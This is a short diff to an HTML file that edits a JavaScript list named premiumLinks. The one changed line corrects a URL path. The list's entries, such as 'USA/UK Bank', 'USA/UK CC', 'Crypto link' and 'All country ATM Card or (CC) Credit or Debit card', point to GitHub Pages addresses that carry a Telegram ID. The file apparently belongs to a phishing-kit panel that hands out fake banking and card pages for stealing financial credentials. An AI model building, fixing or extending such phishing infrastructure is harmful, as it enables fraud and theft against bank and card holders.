--- a/inn.html
+++ b/inn.html
@@ -223,7 +223,7 @@
     ];
     const premiumLinks = [
       { name: "Crypto link", image: "https://bbott52.github.io/Mobixhub/cr.png", urlTemplate: "https://bbott52.github.io/alb/tr?id={telegram-id}" },
-      { name: "USA/UK Bank", image: "https://bbott52.github.io/Mobixhub/us.png", urlTemplate: "https://bbott52.github.io/Mobixhub/premiumlinks/usb.html/?id={telegram-id}" },
+      { name: "USA/UK Bank", image: "https://bbott52.github.io/Mobixhub/us.png", urlTemplate: "https://bbott52.github.io/Mobixhub/premiumlinks/usb.html?id={telegram-id}" },
       { name: "USA/UK Bank and CC", image: "https://bbott52.github.io/Mobixhub/uk.png", urlTemplate: "https://bbott52.github.io/Mobixhub?promo={telegram-id}" },
       { name: "USA/UK CC", image: "https://bbott52.github.io/Mobixhub/cc.png", urlTemplate: "https://bbott52.github.io/Mobixhub?promo={telegram-id}" },
                          { name: "All country ATM Card or (CC) Credit or Debit card", image: "https://bbott52.github.io/Mobixhub/cc.png", urlTemplate: "https://ilyelya.github.io/n/ce.html?id={telegram-id}" },
